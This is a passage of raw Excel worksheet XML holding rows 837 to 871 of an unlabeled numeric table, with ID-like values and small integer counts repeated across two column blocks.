      <c r="K837" s="7">
        <v>2157</v>
      </c>
      <c r="L837" s="8">
        <v>6</v>
      </c>
      <c r="M837" s="8">
        <v>1</v>
      </c>
      <c r="N837" s="8">
        <v>0</v>
      </c>
      <c r="O837" s="8">
        <v>0</v>
      </c>
      <c r="P837" s="8">
        <v>3</v>
      </c>
      <c r="Q837" s="8">
        <v>1</v>
      </c>
    </row>
    <row r="838" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A838" s="7">
        <v>2164</v>
      </c>
      <c r="B838" s="8">
        <v>25</v>
      </c>
      <c r="C838" s="8">
        <v>1</v>
      </c>
      <c r="D838" s="8">
        <v>0</v>
      </c>
      <c r="E838" s="8">
        <v>0</v>
      </c>
      <c r="F838" s="8">
        <v>1</v>
      </c>
      <c r="G838" s="8">
        <v>6</v>
      </c>
      <c r="H838" s="8">
        <v>33</v>
      </c>
      <c r="K838" s="7">
        <v>2164</v>
      </c>
      <c r="L838" s="8">
        <v>25</v>
      </c>
      <c r="M838" s="8">
        <v>1</v>
      </c>
      <c r="N838" s="8">
        <v>0</v>
      </c>
      <c r="O838" s="8">
        <v>0</v>
      </c>
      <c r="P838" s="8">
        <v>1</v>
      </c>
      <c r="Q838" s="8">
        <v>6</v>
      </c>
    </row>
    <row r="839" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A839" s="7">
        <v>2178</v>
      </c>
      <c r="B839" s="8">
        <v>0</v>
      </c>
      <c r="C839" s="8">
        <v>0</v>
      </c>
      <c r="D839" s="8">
        <v>0</v>
      </c>
      <c r="E839" s="8">
        <v>0</v>
      </c>
      <c r="F839" s="8">
        <v>11</v>
      </c>
      <c r="G839" s="8">
        <v>14</v>
      </c>
      <c r="H839" s="8">
        <v>25</v>
      </c>
      <c r="K839" s="7">
        <v>2178</v>
      </c>
      <c r="L839" s="8">
        <v>0</v>
      </c>
      <c r="M839" s="8">
        <v>0</v>
      </c>
      <c r="N839" s="8">
        <v>0</v>
      </c>
      <c r="O839" s="8">
        <v>0</v>
      </c>
      <c r="P839" s="8">
        <v>11</v>
      </c>
      <c r="Q839" s="8">
        <v>14</v>
      </c>
    </row>
    <row r="840" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A840" s="7">
        <v>2183</v>
      </c>
      <c r="B840" s="8">
        <v>24</v>
      </c>
      <c r="C840" s="8">
        <v>0</v>
      </c>
      <c r="D840" s="8">
        <v>0</v>
      </c>
      <c r="E840" s="8">
        <v>0</v>
      </c>
      <c r="F840" s="8">
        <v>5</v>
      </c>
      <c r="G840" s="8">
        <v>0</v>
      </c>
      <c r="H840" s="8">
        <v>29</v>
      </c>
      <c r="K840" s="7">
        <v>2183</v>
      </c>
      <c r="L840" s="8">
        <v>24</v>
      </c>
      <c r="M840" s="8">
        <v>0</v>
      </c>
      <c r="N840" s="8">
        <v>0</v>
      </c>
      <c r="O840" s="8">
        <v>0</v>
      </c>
      <c r="P840" s="8">
        <v>5</v>
      </c>
      <c r="Q840" s="8">
        <v>0</v>
      </c>
    </row>
    <row r="841" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A841" s="7">
        <v>2186</v>
      </c>
      <c r="B841" s="8">
        <v>1</v>
      </c>
      <c r="C841" s="8">
        <v>1</v>
      </c>
      <c r="D841" s="8">
        <v>5</v>
      </c>
      <c r="E841" s="8">
        <v>0</v>
      </c>
      <c r="F841" s="8">
        <v>2</v>
      </c>
      <c r="G841" s="8">
        <v>2</v>
      </c>
      <c r="H841" s="8">
        <v>11</v>
      </c>
      <c r="K841" s="7">
        <v>2186</v>
      </c>
      <c r="L841" s="8">
        <v>1</v>
      </c>
      <c r="M841" s="8">
        <v>1</v>
      </c>
      <c r="N841" s="8">
        <v>5</v>
      </c>
      <c r="O841" s="8">
        <v>0</v>
      </c>
      <c r="P841" s="8">
        <v>2</v>
      </c>
      <c r="Q841" s="8">
        <v>2</v>
      </c>
    </row>
    <row r="842" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A842" s="7">
        <v>2189</v>
      </c>
      <c r="B842" s="8">
        <v>24</v>
      </c>
      <c r="C842" s="8">
        <v>1</v>
      </c>
      <c r="D842" s="8">
        <v>53</v>
      </c>
      <c r="E842" s="8">
        <v>167</v>
      </c>
      <c r="F842" s="8">
        <v>52</v>
      </c>
      <c r="G842" s="8">
        <v>75</v>
      </c>
      <c r="H842" s="8">
        <v>372</v>
      </c>
      <c r="K842" s="7">
        <v>2189</v>
      </c>
      <c r="L842" s="8">
        <v>24</v>
      </c>
      <c r="M842" s="8">
        <v>1</v>
      </c>
      <c r="N842" s="8">
        <v>53</v>
      </c>
      <c r="O842" s="8">
        <v>167</v>
      </c>
      <c r="P842" s="8">
        <v>52</v>
      </c>
      <c r="Q842" s="8">
        <v>75</v>
      </c>
    </row>
    <row r="843" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A843" s="7">
        <v>2191</v>
      </c>
      <c r="B843" s="8">
        <v>20</v>
      </c>
      <c r="C843" s="8">
        <v>1</v>
      </c>
      <c r="D843" s="8">
        <v>1</v>
      </c>
      <c r="E843" s="8">
        <v>0</v>
      </c>
      <c r="F843" s="8">
        <v>2</v>
      </c>
      <c r="G843" s="8">
        <v>0</v>
      </c>
      <c r="H843" s="8">
        <v>24</v>
      </c>
      <c r="K843" s="7">
        <v>2191</v>
      </c>
      <c r="L843" s="8">
        <v>20</v>
      </c>
      <c r="M843" s="8">
        <v>1</v>
      </c>
      <c r="N843" s="8">
        <v>1</v>
      </c>
      <c r="O843" s="8">
        <v>0</v>
      </c>
      <c r="P843" s="8">
        <v>2</v>
      </c>
      <c r="Q843" s="8">
        <v>0</v>
      </c>
    </row>
    <row r="844" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A844" s="7">
        <v>2196</v>
      </c>
      <c r="B844" s="8">
        <v>6</v>
      </c>
      <c r="C844" s="8">
        <v>1</v>
      </c>
      <c r="D844" s="8">
        <v>15</v>
      </c>
      <c r="E844" s="8">
        <v>3</v>
      </c>
      <c r="F844" s="8">
        <v>18</v>
      </c>
      <c r="G844" s="8">
        <v>6</v>
      </c>
      <c r="H844" s="8">
        <v>49</v>
      </c>
      <c r="K844" s="7">
        <v>2196</v>
      </c>
      <c r="L844" s="8">
        <v>6</v>
      </c>
      <c r="M844" s="8">
        <v>1</v>
      </c>
      <c r="N844" s="8">
        <v>15</v>
      </c>
      <c r="O844" s="8">
        <v>3</v>
      </c>
      <c r="P844" s="8">
        <v>18</v>
      </c>
      <c r="Q844" s="8">
        <v>6</v>
      </c>
    </row>
    <row r="845" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A845" s="7">
        <v>2202</v>
      </c>
      <c r="B845" s="8">
        <v>30</v>
      </c>
      <c r="C845" s="8">
        <v>1</v>
      </c>
      <c r="D845" s="8">
        <v>4</v>
      </c>
      <c r="E845" s="8">
        <v>3</v>
      </c>
      <c r="F845" s="8">
        <v>6</v>
      </c>
      <c r="G845" s="8">
        <v>4</v>
      </c>
      <c r="H845" s="8">
        <v>48</v>
      </c>
      <c r="K845" s="7">
        <v>2202</v>
      </c>
      <c r="L845" s="8">
        <v>30</v>
      </c>
      <c r="M845" s="8">
        <v>1</v>
      </c>
      <c r="N845" s="8">
        <v>4</v>
      </c>
      <c r="O845" s="8">
        <v>3</v>
      </c>
      <c r="P845" s="8">
        <v>6</v>
      </c>
      <c r="Q845" s="8">
        <v>4</v>
      </c>
    </row>
    <row r="846" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A846" s="7">
        <v>2203</v>
      </c>
      <c r="B846" s="8">
        <v>20</v>
      </c>
      <c r="C846" s="8">
        <v>1</v>
      </c>
      <c r="D846" s="8">
        <v>4</v>
      </c>
      <c r="E846" s="8">
        <v>3</v>
      </c>
      <c r="F846" s="8">
        <v>6</v>
      </c>
      <c r="G846" s="8">
        <v>6</v>
      </c>
      <c r="H846" s="8">
        <v>40</v>
      </c>
      <c r="K846" s="7">
        <v>2203</v>
      </c>
      <c r="L846" s="8">
        <v>20</v>
      </c>
      <c r="M846" s="8">
        <v>1</v>
      </c>
      <c r="N846" s="8">
        <v>4</v>
      </c>
      <c r="O846" s="8">
        <v>3</v>
      </c>
      <c r="P846" s="8">
        <v>6</v>
      </c>
      <c r="Q846" s="8">
        <v>6</v>
      </c>
    </row>
    <row r="847" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A847" s="7">
        <v>2204</v>
      </c>
      <c r="B847" s="8">
        <v>0</v>
      </c>
      <c r="C847" s="8">
        <v>0</v>
      </c>
      <c r="D847" s="8">
        <v>0</v>
      </c>
      <c r="E847" s="8">
        <v>0</v>
      </c>
      <c r="F847" s="8">
        <v>0</v>
      </c>
      <c r="G847" s="8">
        <v>20</v>
      </c>
      <c r="H847" s="8">
        <v>20</v>
      </c>
      <c r="K847" s="7">
        <v>2204</v>
      </c>
      <c r="L847" s="8">
        <v>0</v>
      </c>
      <c r="M847" s="8">
        <v>0</v>
      </c>
      <c r="N847" s="8">
        <v>0</v>
      </c>
      <c r="O847" s="8">
        <v>0</v>
      </c>
      <c r="P847" s="8">
        <v>0</v>
      </c>
      <c r="Q847" s="8">
        <v>20</v>
      </c>
    </row>
    <row r="848" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A848" s="7">
        <v>2205</v>
      </c>
      <c r="B848" s="8">
        <v>30</v>
      </c>
      <c r="C848" s="8">
        <v>0</v>
      </c>
      <c r="D848" s="8">
        <v>0</v>
      </c>
      <c r="E848" s="8">
        <v>1</v>
      </c>
      <c r="F848" s="8">
        <v>1</v>
      </c>
      <c r="G848" s="8">
        <v>1</v>
      </c>
      <c r="H848" s="8">
        <v>33</v>
      </c>
      <c r="K848" s="7">
        <v>2205</v>
      </c>
      <c r="L848" s="8">
        <v>30</v>
      </c>
      <c r="M848" s="8">
        <v>0</v>
      </c>
      <c r="N848" s="8">
        <v>0</v>
      </c>
      <c r="O848" s="8">
        <v>1</v>
      </c>
      <c r="P848" s="8">
        <v>1</v>
      </c>
      <c r="Q848" s="8">
        <v>1</v>
      </c>
    </row>
    <row r="849" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A849" s="7">
        <v>2206</v>
      </c>
      <c r="B849" s="8">
        <v>30</v>
      </c>
      <c r="C849" s="8">
        <v>1</v>
      </c>
      <c r="D849" s="8">
        <v>5</v>
      </c>
      <c r="E849" s="8">
        <v>5</v>
      </c>
      <c r="F849" s="8">
        <v>16</v>
      </c>
      <c r="G849" s="8">
        <v>8</v>
      </c>
      <c r="H849" s="8">
        <v>65</v>
      </c>
      <c r="K849" s="7">
        <v>2206</v>
      </c>
      <c r="L849" s="8">
        <v>30</v>
      </c>
      <c r="M849" s="8">
        <v>1</v>
      </c>
      <c r="N849" s="8">
        <v>5</v>
      </c>
      <c r="O849" s="8">
        <v>5</v>
      </c>
      <c r="P849" s="8">
        <v>16</v>
      </c>
      <c r="Q849" s="8">
        <v>8</v>
      </c>
    </row>
    <row r="850" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A850" s="7">
        <v>2209</v>
      </c>
      <c r="B850" s="8">
        <v>26</v>
      </c>
      <c r="C850" s="8">
        <v>0</v>
      </c>
      <c r="D850" s="8">
        <v>0</v>
      </c>
      <c r="E850" s="8">
        <v>1</v>
      </c>
      <c r="F850" s="8">
        <v>1</v>
      </c>
      <c r="G850" s="8">
        <v>6</v>
      </c>
      <c r="H850" s="8">
        <v>34</v>
      </c>
      <c r="K850" s="7">
        <v>2209</v>
      </c>
      <c r="L850" s="8">
        <v>26</v>
      </c>
      <c r="M850" s="8">
        <v>0</v>
      </c>
      <c r="N850" s="8">
        <v>0</v>
      </c>
      <c r="O850" s="8">
        <v>1</v>
      </c>
      <c r="P850" s="8">
        <v>1</v>
      </c>
      <c r="Q850" s="8">
        <v>6</v>
      </c>
    </row>
    <row r="851" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A851" s="7">
        <v>2213</v>
      </c>
      <c r="B851" s="8">
        <v>25</v>
      </c>
      <c r="C851" s="8">
        <v>1</v>
      </c>
      <c r="D851" s="8">
        <v>0</v>
      </c>
      <c r="E851" s="8">
        <v>0</v>
      </c>
      <c r="F851" s="8">
        <v>11</v>
      </c>
      <c r="G851" s="8">
        <v>424</v>
      </c>
      <c r="H851" s="8">
        <v>461</v>
      </c>
      <c r="K851" s="7">
        <v>2213</v>
      </c>
      <c r="L851" s="8">
        <v>25</v>
      </c>
      <c r="M851" s="8">
        <v>1</v>
      </c>
      <c r="N851" s="8">
        <v>0</v>
      </c>
      <c r="O851" s="8">
        <v>0</v>
      </c>
      <c r="P851" s="8">
        <v>11</v>
      </c>
      <c r="Q851" s="8">
        <v>424</v>
      </c>
    </row>
    <row r="852" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A852" s="7">
        <v>2217</v>
      </c>
      <c r="B852" s="8">
        <v>26</v>
      </c>
      <c r="C852" s="8">
        <v>1</v>
      </c>
      <c r="D852" s="8">
        <v>0</v>
      </c>
      <c r="E852" s="8">
        <v>0</v>
      </c>
      <c r="F852" s="8">
        <v>7</v>
      </c>
      <c r="G852" s="8">
        <v>1</v>
      </c>
      <c r="H852" s="8">
        <v>35</v>
      </c>
      <c r="K852" s="7">
        <v>2217</v>
      </c>
      <c r="L852" s="8">
        <v>26</v>
      </c>
      <c r="M852" s="8">
        <v>1</v>
      </c>
      <c r="N852" s="8">
        <v>0</v>
      </c>
      <c r="O852" s="8">
        <v>0</v>
      </c>
      <c r="P852" s="8">
        <v>7</v>
      </c>
      <c r="Q852" s="8">
        <v>1</v>
      </c>
    </row>
    <row r="853" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A853" s="7">
        <v>2229</v>
      </c>
      <c r="B853" s="8">
        <v>24</v>
      </c>
      <c r="C853" s="8">
        <v>3</v>
      </c>
      <c r="D853" s="8">
        <v>41</v>
      </c>
      <c r="E853" s="8">
        <v>1</v>
      </c>
      <c r="F853" s="8">
        <v>4</v>
      </c>
      <c r="G853" s="8">
        <v>2</v>
      </c>
      <c r="H853" s="8">
        <v>75</v>
      </c>
      <c r="K853" s="7">
        <v>2229</v>
      </c>
      <c r="L853" s="8">
        <v>24</v>
      </c>
      <c r="M853" s="8">
        <v>3</v>
      </c>
      <c r="N853" s="8">
        <v>41</v>
      </c>
      <c r="O853" s="8">
        <v>1</v>
      </c>
      <c r="P853" s="8">
        <v>4</v>
      </c>
      <c r="Q853" s="8">
        <v>2</v>
      </c>
    </row>
    <row r="854" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A854" s="7">
        <v>2231</v>
      </c>
      <c r="B854" s="8">
        <v>20</v>
      </c>
      <c r="C854" s="8">
        <v>1</v>
      </c>
      <c r="D854" s="8">
        <v>4</v>
      </c>
      <c r="E854" s="8">
        <v>0</v>
      </c>
      <c r="F854" s="8">
        <v>4</v>
      </c>
      <c r="G854" s="8">
        <v>1</v>
      </c>
      <c r="H854" s="8">
        <v>30</v>
      </c>
      <c r="K854" s="7">
        <v>2231</v>
      </c>
      <c r="L854" s="8">
        <v>20</v>
      </c>
      <c r="M854" s="8">
        <v>1</v>
      </c>
      <c r="N854" s="8">
        <v>4</v>
      </c>
      <c r="O854" s="8">
        <v>0</v>
      </c>
      <c r="P854" s="8">
        <v>4</v>
      </c>
      <c r="Q854" s="8">
        <v>1</v>
      </c>
    </row>
    <row r="855" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A855" s="7">
        <v>2234</v>
      </c>
      <c r="B855" s="8">
        <v>0</v>
      </c>
      <c r="C855" s="8">
        <v>0</v>
      </c>
      <c r="D855" s="8">
        <v>0</v>
      </c>
      <c r="E855" s="8">
        <v>4</v>
      </c>
      <c r="F855" s="8">
        <v>2</v>
      </c>
      <c r="G855" s="8">
        <v>6</v>
      </c>
      <c r="H855" s="8">
        <v>12</v>
      </c>
      <c r="K855" s="7">
        <v>2234</v>
      </c>
      <c r="L855" s="8">
        <v>0</v>
      </c>
      <c r="M855" s="8">
        <v>0</v>
      </c>
      <c r="N855" s="8">
        <v>0</v>
      </c>
      <c r="O855" s="8">
        <v>4</v>
      </c>
      <c r="P855" s="8">
        <v>2</v>
      </c>
      <c r="Q855" s="8">
        <v>6</v>
      </c>
    </row>
    <row r="856" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A856" s="7">
        <v>2235</v>
      </c>
      <c r="B856" s="8">
        <v>26</v>
      </c>
      <c r="C856" s="8">
        <v>1</v>
      </c>
      <c r="D856" s="8">
        <v>114</v>
      </c>
      <c r="E856" s="8">
        <v>153</v>
      </c>
      <c r="F856" s="8">
        <v>27</v>
      </c>
      <c r="G856" s="8">
        <v>110</v>
      </c>
      <c r="H856" s="8">
        <v>431</v>
      </c>
      <c r="K856" s="7">
        <v>2235</v>
      </c>
      <c r="L856" s="8">
        <v>26</v>
      </c>
      <c r="M856" s="8">
        <v>1</v>
      </c>
      <c r="N856" s="8">
        <v>114</v>
      </c>
      <c r="O856" s="8">
        <v>153</v>
      </c>
      <c r="P856" s="8">
        <v>27</v>
      </c>
      <c r="Q856" s="8">
        <v>110</v>
      </c>
    </row>
    <row r="857" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A857" s="7">
        <v>2236</v>
      </c>
      <c r="B857" s="8">
        <v>15</v>
      </c>
      <c r="C857" s="8">
        <v>2</v>
      </c>
      <c r="D857" s="8">
        <v>2</v>
      </c>
      <c r="E857" s="8">
        <v>0</v>
      </c>
      <c r="F857" s="8">
        <v>9</v>
      </c>
      <c r="G857" s="8">
        <v>4</v>
      </c>
      <c r="H857" s="8">
        <v>32</v>
      </c>
      <c r="K857" s="7">
        <v>2236</v>
      </c>
      <c r="L857" s="8">
        <v>15</v>
      </c>
      <c r="M857" s="8">
        <v>2</v>
      </c>
      <c r="N857" s="8">
        <v>2</v>
      </c>
      <c r="O857" s="8">
        <v>0</v>
      </c>
      <c r="P857" s="8">
        <v>9</v>
      </c>
      <c r="Q857" s="8">
        <v>4</v>
      </c>
    </row>
    <row r="858" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A858" s="7">
        <v>2241</v>
      </c>
      <c r="B858" s="8">
        <v>0</v>
      </c>
      <c r="C858" s="8">
        <v>0</v>
      </c>
      <c r="D858" s="8">
        <v>20</v>
      </c>
      <c r="E858" s="8">
        <v>130</v>
      </c>
      <c r="F858" s="8">
        <v>20</v>
      </c>
      <c r="G858" s="8">
        <v>25</v>
      </c>
      <c r="H858" s="8">
        <v>195</v>
      </c>
      <c r="K858" s="7">
        <v>2241</v>
      </c>
      <c r="L858" s="8">
        <v>0</v>
      </c>
      <c r="M858" s="8">
        <v>0</v>
      </c>
      <c r="N858" s="8">
        <v>20</v>
      </c>
      <c r="O858" s="8">
        <v>130</v>
      </c>
      <c r="P858" s="8">
        <v>20</v>
      </c>
      <c r="Q858" s="8">
        <v>25</v>
      </c>
    </row>
    <row r="859" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A859" s="7">
        <v>2242</v>
      </c>
      <c r="B859" s="8">
        <v>40</v>
      </c>
      <c r="C859" s="8">
        <v>1</v>
      </c>
      <c r="D859" s="8">
        <v>3</v>
      </c>
      <c r="E859" s="8">
        <v>0</v>
      </c>
      <c r="F859" s="8">
        <v>17</v>
      </c>
      <c r="G859" s="8">
        <v>0</v>
      </c>
      <c r="H859" s="8">
        <v>61</v>
      </c>
      <c r="K859" s="7">
        <v>2242</v>
      </c>
      <c r="L859" s="8">
        <v>40</v>
      </c>
      <c r="M859" s="8">
        <v>1</v>
      </c>
      <c r="N859" s="8">
        <v>3</v>
      </c>
      <c r="O859" s="8">
        <v>0</v>
      </c>
      <c r="P859" s="8">
        <v>17</v>
      </c>
      <c r="Q859" s="8">
        <v>0</v>
      </c>
    </row>
    <row r="860" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A860" s="7">
        <v>2243</v>
      </c>
      <c r="B860" s="8">
        <v>30</v>
      </c>
      <c r="C860" s="8">
        <v>1</v>
      </c>
      <c r="D860" s="8">
        <v>5</v>
      </c>
      <c r="E860" s="8">
        <v>0</v>
      </c>
      <c r="F860" s="8">
        <v>0</v>
      </c>
      <c r="G860" s="8">
        <v>2</v>
      </c>
      <c r="H860" s="8">
        <v>38</v>
      </c>
      <c r="K860" s="7">
        <v>2243</v>
      </c>
      <c r="L860" s="8">
        <v>30</v>
      </c>
      <c r="M860" s="8">
        <v>1</v>
      </c>
      <c r="N860" s="8">
        <v>5</v>
      </c>
      <c r="O860" s="8">
        <v>0</v>
      </c>
      <c r="P860" s="8">
        <v>0</v>
      </c>
      <c r="Q860" s="8">
        <v>2</v>
      </c>
    </row>
    <row r="861" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A861" s="7">
        <v>2244</v>
      </c>
      <c r="B861" s="8">
        <v>0</v>
      </c>
      <c r="C861" s="8">
        <v>0</v>
      </c>
      <c r="D861" s="8">
        <v>34</v>
      </c>
      <c r="E861" s="8">
        <v>79</v>
      </c>
      <c r="F861" s="8">
        <v>14</v>
      </c>
      <c r="G861" s="8">
        <v>30</v>
      </c>
      <c r="H861" s="8">
        <v>157</v>
      </c>
      <c r="K861" s="7">
        <v>2244</v>
      </c>
      <c r="L861" s="8">
        <v>0</v>
      </c>
      <c r="M861" s="8">
        <v>0</v>
      </c>
      <c r="N861" s="8">
        <v>34</v>
      </c>
      <c r="O861" s="8">
        <v>79</v>
      </c>
      <c r="P861" s="8">
        <v>14</v>
      </c>
      <c r="Q861" s="8">
        <v>30</v>
      </c>
    </row>
    <row r="862" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A862" s="7">
        <v>2245</v>
      </c>
      <c r="B862" s="8">
        <v>22</v>
      </c>
      <c r="C862" s="8">
        <v>2</v>
      </c>
      <c r="D862" s="8">
        <v>1</v>
      </c>
      <c r="E862" s="8">
        <v>0</v>
      </c>
      <c r="F862" s="8">
        <v>2</v>
      </c>
      <c r="G862" s="8">
        <v>1</v>
      </c>
      <c r="H862" s="8">
        <v>28</v>
      </c>
      <c r="K862" s="7">
        <v>2245</v>
      </c>
      <c r="L862" s="8">
        <v>22</v>
      </c>
      <c r="M862" s="8">
        <v>2</v>
      </c>
      <c r="N862" s="8">
        <v>1</v>
      </c>
      <c r="O862" s="8">
        <v>0</v>
      </c>
      <c r="P862" s="8">
        <v>2</v>
      </c>
      <c r="Q862" s="8">
        <v>1</v>
      </c>
    </row>
    <row r="863" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A863" s="7">
        <v>2246</v>
      </c>
      <c r="B863" s="8">
        <v>26</v>
      </c>
      <c r="C863" s="8">
        <v>2</v>
      </c>
      <c r="D863" s="8">
        <v>15</v>
      </c>
      <c r="E863" s="8">
        <v>6</v>
      </c>
      <c r="F863" s="8">
        <v>7</v>
      </c>
      <c r="G863" s="8">
        <v>0</v>
      </c>
      <c r="H863" s="8">
        <v>56</v>
      </c>
      <c r="K863" s="7">
        <v>2246</v>
      </c>
      <c r="L863" s="8">
        <v>26</v>
      </c>
      <c r="M863" s="8">
        <v>2</v>
      </c>
      <c r="N863" s="8">
        <v>15</v>
      </c>
      <c r="O863" s="8">
        <v>6</v>
      </c>
      <c r="P863" s="8">
        <v>7</v>
      </c>
      <c r="Q863" s="8">
        <v>0</v>
      </c>
    </row>
    <row r="864" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A864" s="7">
        <v>2247</v>
      </c>
      <c r="B864" s="8">
        <v>0</v>
      </c>
      <c r="C864" s="8">
        <v>0</v>
      </c>
      <c r="D864" s="8">
        <v>0</v>
      </c>
      <c r="E864" s="8">
        <v>0</v>
      </c>
      <c r="F864" s="8">
        <v>10</v>
      </c>
      <c r="G864" s="8">
        <v>10</v>
      </c>
      <c r="H864" s="8">
        <v>20</v>
      </c>
      <c r="K864" s="7">
        <v>2247</v>
      </c>
      <c r="L864" s="8">
        <v>0</v>
      </c>
      <c r="M864" s="8">
        <v>0</v>
      </c>
      <c r="N864" s="8">
        <v>0</v>
      </c>
      <c r="O864" s="8">
        <v>0</v>
      </c>
      <c r="P864" s="8">
        <v>10</v>
      </c>
      <c r="Q864" s="8">
        <v>10</v>
      </c>
    </row>
    <row r="865" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A865" s="7">
        <v>2249</v>
      </c>
      <c r="B865" s="8">
        <v>25</v>
      </c>
      <c r="C865" s="8">
        <v>1</v>
      </c>
      <c r="D865" s="8">
        <v>6</v>
      </c>
      <c r="E865" s="8">
        <v>3</v>
      </c>
      <c r="F865" s="8">
        <v>4</v>
      </c>
      <c r="G865" s="8">
        <v>1</v>
      </c>
      <c r="H865" s="8">
        <v>40</v>
      </c>
      <c r="K865" s="7">
        <v>2249</v>
      </c>
      <c r="L865" s="8">
        <v>25</v>
      </c>
      <c r="M865" s="8">
        <v>1</v>
      </c>
      <c r="N865" s="8">
        <v>6</v>
      </c>
      <c r="O865" s="8">
        <v>3</v>
      </c>
      <c r="P865" s="8">
        <v>4</v>
      </c>
      <c r="Q865" s="8">
        <v>1</v>
      </c>
    </row>
    <row r="866" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A866" s="7">
        <v>2250</v>
      </c>
      <c r="B866" s="8">
        <v>6</v>
      </c>
      <c r="C866" s="8">
        <v>1</v>
      </c>
      <c r="D866" s="8">
        <v>0</v>
      </c>
      <c r="E866" s="8">
        <v>0</v>
      </c>
      <c r="F866" s="8">
        <v>2</v>
      </c>
      <c r="G866" s="8">
        <v>12</v>
      </c>
      <c r="H866" s="8">
        <v>21</v>
      </c>
      <c r="K866" s="7">
        <v>2250</v>
      </c>
      <c r="L866" s="8">
        <v>6</v>
      </c>
      <c r="M866" s="8">
        <v>1</v>
      </c>
      <c r="N866" s="8">
        <v>0</v>
      </c>
      <c r="O866" s="8">
        <v>0</v>
      </c>
      <c r="P866" s="8">
        <v>2</v>
      </c>
      <c r="Q866" s="8">
        <v>12</v>
      </c>
    </row>
    <row r="867" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A867" s="7">
        <v>2252</v>
      </c>
      <c r="B867" s="8">
        <v>24</v>
      </c>
      <c r="C867" s="8">
        <v>1</v>
      </c>
      <c r="D867" s="8">
        <v>2</v>
      </c>
      <c r="E867" s="8">
        <v>4</v>
      </c>
      <c r="F867" s="8">
        <v>2</v>
      </c>
      <c r="G867" s="8">
        <v>1</v>
      </c>
      <c r="H867" s="8">
        <v>34</v>
      </c>
      <c r="K867" s="7">
        <v>2252</v>
      </c>
      <c r="L867" s="8">
        <v>24</v>
      </c>
      <c r="M867" s="8">
        <v>1</v>
      </c>
      <c r="N867" s="8">
        <v>2</v>
      </c>
      <c r="O867" s="8">
        <v>4</v>
      </c>
      <c r="P867" s="8">
        <v>2</v>
      </c>
      <c r="Q867" s="8">
        <v>1</v>
      </c>
    </row>
    <row r="868" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A868" s="7">
        <v>2253</v>
      </c>
      <c r="B868" s="8">
        <v>20</v>
      </c>
      <c r="C868" s="8">
        <v>1</v>
      </c>
      <c r="D868" s="8">
        <v>60</v>
      </c>
      <c r="E868" s="8">
        <v>281</v>
      </c>
      <c r="F868" s="8">
        <v>46</v>
      </c>
      <c r="G868" s="8">
        <v>49</v>
      </c>
      <c r="H868" s="8">
        <v>457</v>
      </c>
      <c r="K868" s="7">
        <v>2253</v>
      </c>
      <c r="L868" s="8">
        <v>20</v>
      </c>
      <c r="M868" s="8">
        <v>1</v>
      </c>
      <c r="N868" s="8">
        <v>60</v>
      </c>
      <c r="O868" s="8">
        <v>281</v>
      </c>
      <c r="P868" s="8">
        <v>46</v>
      </c>
      <c r="Q868" s="8">
        <v>49</v>
      </c>
    </row>
    <row r="869" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A869" s="7">
        <v>2254</v>
      </c>
      <c r="B869" s="8">
        <v>25</v>
      </c>
      <c r="C869" s="8">
        <v>1</v>
      </c>
      <c r="D869" s="8">
        <v>2</v>
      </c>
      <c r="E869" s="8">
        <v>0</v>
      </c>
      <c r="F869" s="8">
        <v>6</v>
      </c>
      <c r="G869" s="8">
        <v>4</v>
      </c>
      <c r="H869" s="8">
        <v>38</v>
      </c>
      <c r="K869" s="7">
        <v>2254</v>
      </c>
      <c r="L869" s="8">
        <v>25</v>
      </c>
      <c r="M869" s="8">
        <v>1</v>
      </c>
      <c r="N869" s="8">
        <v>2</v>
      </c>
      <c r="O869" s="8">
        <v>0</v>
      </c>
      <c r="P869" s="8">
        <v>6</v>
      </c>
      <c r="Q869" s="8">
        <v>4</v>
      </c>
    </row>
    <row r="870" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A870" s="7">
        <v>2255</v>
      </c>
      <c r="B870" s="8">
        <v>25</v>
      </c>
      <c r="C870" s="8">
        <v>1</v>
      </c>
      <c r="D870" s="8">
        <v>5</v>
      </c>
      <c r="E870" s="8">
        <v>10</v>
      </c>
      <c r="F870" s="8">
        <v>2</v>
      </c>
      <c r="G870" s="8">
        <v>0</v>
      </c>
      <c r="H870" s="8">
        <v>43</v>
      </c>
      <c r="K870" s="7">
        <v>2255</v>
      </c>
      <c r="L870" s="8">
        <v>25</v>
      </c>
      <c r="M870" s="8">
        <v>1</v>
      </c>
      <c r="N870" s="8">
        <v>5</v>
      </c>
      <c r="O870" s="8">
        <v>10</v>
      </c>
      <c r="P870" s="8">
        <v>2</v>
      </c>
      <c r="Q870" s="8">
        <v>0</v>
      </c>
    </row>
    <row r="871" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A871" s="7">
        <v>2259</v>
      </c>
      <c r="B871" s="8">
        <v>25</v>
      </c>
      <c r="C871" s="8">
        <v>2</v>
      </c>
      <c r="D871" s="8">
        <v>40</v>
      </c>
      <c r="E871" s="8">
        <v>69</v>
      </c>
      <c r="F871" s="8">
